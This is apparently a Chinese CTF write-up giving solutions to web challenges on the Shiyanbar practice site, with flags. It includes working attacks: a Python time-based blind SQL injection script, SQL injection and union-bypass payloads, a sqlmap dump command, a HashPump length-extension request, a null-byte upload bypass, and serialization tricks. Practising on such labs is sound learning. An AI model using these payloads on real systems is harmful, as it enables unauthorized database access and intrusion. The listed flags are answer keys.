实验吧ctf
发布时间
阅读量:
阅读量
1/登陆一下好吗??
http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
='
='
ctf{51d1bf8fb65a8c2406513ee8f52283e7}2/who are you ?
http://ctf5.shiyanbar.com/web/wonderkun/index.php
import requests
import time
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
def exp(x,i):
starttime=time.time()
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
xxx = "' or sleep(ascii(mid((select(flag)from(flag))from("+str(x)+")for(1)))=ascii('"+i+"')) and '1'='1"
headers = {
"Host": "ctf5.shiyanbar.com",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-FORWARDED-FOR": xxx
}
res = requests.get(url, headers=headers)
s = time.time() - starttime;
if s > 1:
return 1
else:
return 0
for x in range(1,33):
for i in payloads:
if (exp(x,i)):
flag+=i
print flag
break
else:
pass
print 'flag:'+flag
ctf{cdbf14c9551d5be5612f7bb5d2867853}3/因缺思汀的绕过
http://ctf5.shiyanbar.com/web/pcat/index.php
uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2%23&pwd=
CTF{with_rollup_interesting}4/简单的sql注入之3
http://ctf5.shiyanbar.com/web/index_3.php
sqlmap -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=0' -D web1 --tables -T flag --columns --dump5/简单的sql注入之2
http://ctf5.shiyanbar.com/web/index_2.php
- 基础的SQL注入攻击
http://ctf5.shiyanbar.com/423/web/ - 分析响应头以获取关键信息
http://ctf5.shiyanbar.com/web/10/10.php
import requests
import base64
url = 'http://ctf5.shiyanbar.com/web/10/10.php'
s = requests.session()
response = s.get(url)
head = response.headers
flag = base64.b64decode(head['FLAG']).split(':')[1]
data = {'key': flag}
result = s.post(url=url, data=data)
print result.textCTF{Y0U_4R3_1NCR3D1BL3_F4ST!}
7/让我进去
http://ctf5.shiyanbar.com/web/kzhan.php
root@ubuntu:~/HashPump# hashpump
Input Signature: 571580b26c65f306376d4f64e53cb5c7
Input Data: admin
Input Key Length: 20
Input Data to Add: 123
961a38ded0b8553041ca20dd34e8e189
admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00123
提交内容:
getmein=961a38ded0b8553041ca20dd34e8e189
username=admin&password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00123CTF{cOOkieS_4nd_hAshIng_G0_w3LL_t0g3ther}
8/拐弯抹角
http://ctf5.shiyanbar.com/10/indirection/
CTF{PSEDUO_STATIC_DO_YOU_KNOW}
直接访问得到flag,没意思。9/Forms
http://ctf5.shiyanbar.com/10/main.php
$a = $_POST["PIN"];
if ($a == -19827747736161128312837161661727773716166727272616149001823847) {
echo "Congratulations! The flag is $flag";
} else {
echo "User with provided PIN not found.";
}
</pre>Congratulations! The flag is ctf{forms_are_easy}10/天网管理系统
http://ctf5.shiyanbar.com/10/web1/
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="password"
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas--
ctf{dwduwkhduw5465}11/忘记密码了
http://ctf5.shiyanbar.com/10/upload/
.submit.php.swp
GET /10/upload/submit.php?emailAddress=admin@simplexue.com&token=0000000000
flag is SimCTF{huachuan_TdsWX}12/Once More
http://ctf5.shiyanbar.com/web/more.php
/web/more.php?password=1e8%00*-*
Flag: CTF{Ch3ck_anD_Ch3ck}13/Guess Next Session
http://ctf5.shiyanbar.com/web/Session.php
/web/Session.php?password=
Flag: CTF{Cl3ar_th3_S3ss1on}14/FALSE
http://ctf5.shiyanbar.com/web/false.php
/web/false.php?name[]=1&password[]=2
Flag: CTF{t3st_th3_Sha1}15/上传绕过
http://ctf5.shiyanbar.com/web/upload
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="dir"
/uploads/2.php(注意这里是16进制的00) jpg
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="file"; filename="2.jpg"
Content-Type: applications/octet-stream
/uploads/8a9e5f6a7a789acb.php<br>æå–œä½ èŽ·å¾—flag一枚:<br>flag{SimCTF_huachuan}</body>
</html>16/NSCTF web200
http://ctf5.shiyanbar.com/web/web200.jpg
<?php
$_ = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$_ = str_rot13($_);
$_ = strrev($_);
$_ = base64_decode($_);
$_o = "";
for($_0 = strlen($_) - 1;$_0 >= 0; $_0 --){
$tmp = $_[$_0];
$tmp = ord($tmp);
$tmp --;
$tmp = chr($tmp);
$_o.=$tmp;
}
echo $_o;
?>
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}17/程序逻辑问题
http://ctf5.shiyanbar.com/web/5/index.php
user=' union /*!Select*/ 'c4ca4238a0b923820dcc509a6f75849b'-- - &pass=1
Logged in! Key: SimCTF{youhaocongming}18/what a fuck!这是什么鬼东西?
http://ctf5.shiyanbar.com/DUTCTF/1.html
<script>**</script>
密码是:Ihatejs19/PHP大法
http://ctf5.shiyanbar.com/DUTCTF/index.php
/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a
flag: DUTCTF{PHP_is_the_best_program_language}20/这个看起来有点简单!
http://ctf5.shiyanbar.com/8/index.php?id=1
21号看起来有一定难度。http://ctf5.shiyanbar.com/phpaudit/ 配置Header字段设置X-Forwarded-For头为IPv4地址;尝试添加BP头发现效果不佳。SimCTF{daima_shengji}
21/头有点大
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 .NET CLR 9.9)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-gb,en;q=0.5
The key is:HTTpH34der</p>22/Forbidden
Accept-Language: zh-hk,zh;q=0.8
KEY:123JustUserAGent
23/猫抓老鼠
Content-Row: MTUwMTE1NjUzNA==
Content-Length: 21
Content-Type: text/html
KEY: #WWWnsf0cus_NET#24/看起来有点难
全部评论 (0)
还没有任何评论哟~